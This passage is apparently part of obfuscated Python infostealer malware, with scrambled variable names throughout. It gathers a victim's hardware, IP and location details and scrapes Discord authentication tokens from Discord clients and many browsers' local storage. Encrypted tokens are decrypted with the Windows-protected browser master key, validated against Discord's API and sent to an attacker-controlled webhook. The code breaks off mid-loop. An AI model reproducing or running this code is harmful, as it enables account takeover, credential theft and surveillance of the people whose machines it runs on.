CPU  : {RKQOJZCLGFSOQAENXPFNABJFPADTTEJSVUFFATYBKNONEPOGTZRECVYZNSPA}, {IAKFYBECJPYPTCFSVAYCFSHDWKSIZDMDSZLPEZMYHAAGPTWIYMERJIMZVKGKRGRCXJIORPISVZFBYQALMVBFYKL} Core
GPU  : {GDZRBKCMHNTINJGJJCHWNAOERWTCGOWYAPUBNJSIMKLKJKSMVCBHFIXBVWXNXLUVLDASDOCETYDOGYZOUCPRFQL}
RAM  : {HVIMUTPFWJOQSLNXMFQQNGJWLIMQRZJNNVVHNBGFEJXWMLQCXEQME}Go```""", inline=False)

    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}
Local  : {AHPTQAJQLIIZWEMCJWDMQQQPFUPHTDJTMBAJYZTSTHQUISYEBUFOSRFSPALYHUVBHGLXDKT}
Isp    : {EICOEXOKOGDAKOVNGLRGQELXLWUKPGBTRMRXIHKXSQVUMWDNSKDZXDGYEOYIIWFVCDPCNJFXRXM}
Org    : {AAIQFFKUCOIWHAGAUHZBCTUFEJSIDHJFUPOBGQCSOUTUMJULTFT}
As     : {KBTHTWDIQSXJDUVHFKCEJFYOZDZFYVOWWTTRXHVCQMYUGBKQSJHZDETFYLCXCLNAEEBPWVRUZXKOEJJUKSHQYXRLLAQ}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{MNOTAAXYLBLYWGLTURSRYMNKILIDRUCKVHZGUMWVYSHXJEEATSKSTQYSDCIQTQHRXVUKRUIQWUZTZHLVFDOQXHMPUNHNUWLZIYD}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {FYIJUFTGXIBRKNBDTVHCZBEYACVJUJKPCVJIJTLGVMVCXEHVYXDCUKFBUUXOJGCWKEVJHGNJLVXXUDRAQIXUZHRANBKQ} ({FYIJUFTGXIBRKNBDTVHCZBEYACVJUJKPCVJIJTLGVMVCXEHVYXDCUKFBUUXOJGCWKEVJHGNJLVXXUDRAQIXUZHRANBKQ_code})
Region    : {VFYEWZUKOEPRJWFGVEUEUSJAXGMIKFCRWULJWOPUNYTMWXMFCUYLOLRNVKGBHGM} ({VFYEWZUKOEPRJWFGVEUEUSJAXGMIKFCRWULJWOPUNYTMWXMFCUYLOLRNVKGBHGM_code})
Zip       : {PJHZPIPOEGEKNMVVGZZAVGQPRXQNARFNCOIHMKSANZKTCJSSPDGGFGPIEDLGPYAMLPRVFXYAXOXSRCGFDLYY}
City      : {BUSGCXAQKBTDHNEHVZPOZKLYLTSXJKRZMQAVFWZAFJCBVESUBTQPUARZXYCKVOAHSFZQIBQCPBJTVMXWKOHGMSRUNFU}
Timezone  : {KRZHWBOVVRCBWMCORRCHNXNTVRHJSZLLTGCBNUURRHTROIHMKKCSOMWHSU}
Latitude  : {OQKZTMCQFWOOGNNMUVVXZSIECYBZFUBWOXSMRXMSMTDOVHKGIOSPAVMVMOQOERWCIXUAYGMWNIKVEUPCFZOCVEFCPGUYDHGPNDPI}
Longitude : {NGHFJYDOMXUPPNZUHUVTXQKRBHQERHJCKKJEZGRFZHIRSWLELWMRWEAFZNETSMRTEKNPBUEQLWIMY}```""", inline=False)

    embed.set_footer(text=GYWFMHHKMFRPCNVJZJWRQOJUYSYYUCFCRJDGJTVSFVWCOQZTQBPCFFLUZFNK, icon_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)

    w3bh00k = SyncWebhook.from_url(PTUGQSXYYQRVUXAQTVBEUHRVYOCRRPRXITWHNZTMFWZKVOLIDOJQSQJYTUXBGCAPTLMSERXVDRQEHYEN)
    w3bh00k.send(embed=embed, username=CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA, avatar_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF = "https://discord.com/api/v9/users/@me"
        VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC = os.getenv("localappdata")
        JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR = os.getenv("appdata")
        ZFIZRCPACOAMXRCGKLAQGYZPXZZWEREAMUXRTWHUWYUOIYEAQZAUDJZEMJSJJUXFEHBGXLBLXOISPMETVCRCQ = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        ZFIZRCPACOAMXRCGKLAQGYZPXZZWEREAMUXRTWHUWYUOIYEAQZAUDJZEMJSJJUXFEHBGXLBLXOISPMETVCRCQ_enc = r"dQw4w9WgXcQ:[^\"]*"
        TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ = []
        PTJUSPERPUBDPBPSVAHGLVPCDNPSJMCLQJVRCQOBGYCUUMULOISAYJCUITZXPBFVENSDMUVPJQ = []
        JXSNAJWLJDPZESCXTVINNNGJKNWDXFMLARWZAFEJUIGLWOHBQBUWWSUBJTONSUDEOGGEXGZFGGTUVXZMTLKTXGX = {}

        XMJYCZSWEZNARGCPRMTSPRGFURHMPLCATFOYPHYSOZYYZVOYFMRECKEJNBIRZWDFTSEIIPSLYQUUMRHEOMTSIXZZQKJRD = {
            'Discord': JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': VDAPDLFWUFJPNLJXRYLBCIEVNKOIWTEYIZKXVLUFJRNVJIABYATWDYRLMOBUPKTYFTXGIFJKWJFWIUFGC + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for CQELMTTTTDHXFGRFCHLNXDHEDFMHIONXANHUDKHYWDSBORKWHGNZIYZRVNHTHXLCVEXMCXVHYNOLHHWMHNYJM, CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF in XMJYCZSWEZNARGCPRMTSPRGFURHMPLCATFOYPHYSOZYYZVOYFMRECKEJNBIRZWDFTSEIIPSLYQUUMRHEOMTSIXZZQKJRD.items():
            if not os.path.exists(CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF):
                continue
            PQQFGJGGIPDFDEGOVFFRIYPUYPFOBLMDGEWRCFUHVNFIKHCOLXFRXJUAJVCVVQSYLLWNUEBQOHYSJVPNAWJZGUYAXALPEDVN = CQELMTTTTDHXFGRFCHLNXDHEDFMHIONXANHUDKHYWDSBORKWHGNZIYZRVNHTHXLCVEXMCXVHYNOLHHWMHNYJM.replace(" ", "").lower()
            if "cord" in CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF:
                if not os.path.exists(JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + f'\\{PQQFGJGGIPDFDEGOVFFRIYPUYPFOBLMDGEWRCFUHVNFIKHCOLXFRXJUAJVCVVQSYLLWNUEBQOHYSJVPNAWJZGUYAXALPEDVN}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(ZFIZRCPACOAMXRCGKLAQGYZPXZZWEREAMUXRTWHUWYUOIYEAQZAUDJZEMJSJJUXFEHBGXLBLXOISPMETVCRCQ_enc, v4r_line.strip()):
                                UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + f'\\{PQQFGJGGIPDFDEGOVFFRIYPUYPFOBLMDGEWRCFUHVNFIKHCOLXFRXJUAJVCVVQSYLLWNUEBQOHYSJVPNAWJZGUYAXALPEDVN}\\Local State'))
                                if validate_t0k3n(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG, QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF):
                                    FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO = requests.get(QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF, headers={'Authorization': UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG}).json()['id']
                                    if FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO not in PTJUSPERPUBDPBPSVAHGLVPCDNPSJMCLQJVRCQOBGYCUUMULOISAYJCUITZXPBFVENSDMUVPJQ:
                                        TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ.append(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG)
                                        PTJUSPERPUBDPBPSVAHGLVPCDNPSJMCLQJVRCQOBGYCUUMULOISAYJCUITZXPBFVENSDMUVPJQ.append(FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO)
                                        JXSNAJWLJDPZESCXTVINNNGJKNWDXFMLARWZAFEJUIGLWOHBQBUWWSUBJTONSUDEOGGEXGZFGGTUVXZMTLKTXGX[UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG] = (CQELMTTTTDHXFGRFCHLNXDHEDFMHIONXANHUDKHYWDSBORKWHGNZIYZRVNHTHXLCVEXMCXVHYNOLHHWMHNYJM, f"{CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG in re.findall(ZFIZRCPACOAMXRCGKLAQGYZPXZZWEREAMUXRTWHUWYUOIYEAQZAUDJZEMJSJJUXFEHBGXLBLXOISPMETVCRCQ, v4r_line.strip()):
                                if validate_t0k3n(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG, QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF):
                                    FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO = requests.get(QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF, headers={'Authorization': UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG}).json()['id']
                                    if FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO not in PTJUSPERPUBDPBPSVAHGLVPCDNPSJMCLQJVRCQOBGYCUUMULOISAYJCUITZXPBFVENSDMUVPJQ:
                                        TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ.append(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG)
                                        PTJUSPERPUBDPBPSVAHGLVPCDNPSJMCLQJVRCQOBGYCUUMULOISAYJCUITZXPBFVENSDMUVPJQ.append(FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO)
                                        JXSNAJWLJDPZESCXTVINNNGJKNWDXFMLARWZAFEJUIGLWOHBQBUWWSUBJTONSUDEOGGEXGZFGGTUVXZMTLKTXGX[UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG] = (CQELMTTTTDHXFGRFCHLNXDHEDFMHIONXANHUDKHYWDSBORKWHGNZIYZRVNHTHXLCVEXMCXVHYNOLHHWMHNYJM, f"{CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF}\\{v4r_file_name}")

        if os.path.exists(JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + "\\Mozilla\\Firefox\\Profiles"):
            for CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF, _, v4r_files in os.walk(JLRRWJHMQNLHOUPCODWSDGNVNOAFNWVNDXHVVXBSHQEIMLHQAXAJOPQBYCIUNGCYJEOODLHHAAVQUGGFFSJDANMCAIZZXSDSGRDR + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG in re.findall(ZFIZRCPACOAMXRCGKLAQGYZPXZZWEREAMUXRTWHUWYUOIYEAQZAUDJZEMJSJJUXFEHBGXLBLXOISPMETVCRCQ, v4r_line.strip()):
                                    if validate_t0k3n(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG, QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF):
                                        FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO = requests.get(QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF, headers={'Authorization': UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG}).json()['id']
                                        if FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO not in PTJUSPERPUBDPBPSVAHGLVPCDNPSJMCLQJVRCQOBGYCUUMULOISAYJCUITZXPBFVENSDMUVPJQ:
                                            TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ.append(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG)
                                            PTJUSPERPUBDPBPSVAHGLVPCDNPSJMCLQJVRCQOBGYCUUMULOISAYJCUITZXPBFVENSDMUVPJQ.append(FMSKRWJCPBTFCYQYFHLPEBWBLTOREJMSKUJPFCVYRUCEMWKVLHQMQISYMLXBJTDXQAVTFYAKEDIO)
                                            JXSNAJWLJDPZESCXTVINNNGJKNWDXFMLARWZAFEJUIGLWOHBQBUWWSUBJTONSUDEOGGEXGZFGGTUVXZMTLKTXGX[UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG] = ('Firefox', f"{CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF}\\{v4r__file}")
        return TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ, JXSNAJWLJDPZESCXTVINNNGJKNWDXFMLARWZAFEJUIGLWOHBQBUWWSUBJTONSUDEOGGEXGZFGGTUVXZMTLKTXGX

    def validate_t0k3n(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG, QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF):
        return requests.get(QGCGOWLOUSCTFIAKWSNCVHPEFEBHTCPGNVXLVHSZYXLADIJKUVSLYF, headers={'Authorization': UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG}).status_code == 200

    def decrypt_val(JYDXCBLHOQLDAQXOZDZZTGCRGHIVMOBWDLAYQVDWWIKFTFLPAGQPGUQDOOC, v4r_master_key):
        v4r_iv = JYDXCBLHOQLDAQXOZDZZTGCRGHIVMOBWDLAYQVDWWIKFTFLPAGQPGUQDOOC[3:15]
        v4r_payload = JYDXCBLHOQLDAQXOZDZZTGCRGHIVMOBWDLAYQVDWWIKFTFLPAGQPGUQDOOC[15:]
        v4r_cipher = AES.new(v4r_master_key, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:-16].decode()

    def get_master_key(CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF):
        if not os.path.exists(CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF):
            return None
        with open(CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF, "r", encoding="utf-8") as v4r_f:
            v4r_local_state = json.load(v4r_f)
        v4r_master_key = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(v4r_master_key, None, None, None, 0)[1]

    def upload_t0k3n5():
        TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ, JXSNAJWLJDPZESCXTVINNNGJKNWDXFMLARWZAFEJUIGLWOHBQBUWWSUBJTONSUDEOGGEXGZFGGTUVXZMTLKTXGX = extr4ct_t0k3n5()
        HJUCXCCTDNCBVKFKLEPEFFXWGKCVQORRWXGXYAXCWOGRNGHSUMODUSEJKFFBWI = SyncWebhook.from_url(PTUGQSXYYQRVUXAQTVBEUHRVYOCRRPRXITWHNZTMFWZKVOLIDOJQSQJYTUXBGCAPTLMSERXVDRQEHYEN)

        if not TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ:
            GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY = Embed(
                title=f'Discord Token `{ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST} "{TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}"`:', 
                description=f"No discord tokens found.",
                color=XFOCFMWETLKNBSGDAFNFPWWACXSQQTCJMGVLOODVUMYRIZSMGDCTBJPDVLRHRLUIHGCHDKUBXUAFROMKLGEHXNTNSQXDNMH)
            GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.set_footer(text=GYWFMHHKMFRPCNVJZJWRQOJUYSYYUCFCRJDGJTVSFVWCOQZTQBPCFFLUZFNK, icon_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)
            HJUCXCCTDNCBVKFKLEPEFFXWGKCVQORRWXGXYAXCWOGRNGHSUMODUSEJKFFBWI.send(embed=GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY, username=CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA, avatar_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)
            return
        
        for UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG_d15c0rd in TSSBIXIALHWPVCUUXGJSKGYZMBIWYMALZZYKEVLJNMAWCQEIPTLUGONKHLKMKMKMNJXFGLPYVRWOQQLTQDQJWUYWKWBDXZZ:
            JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG_d15c0rd}).json()

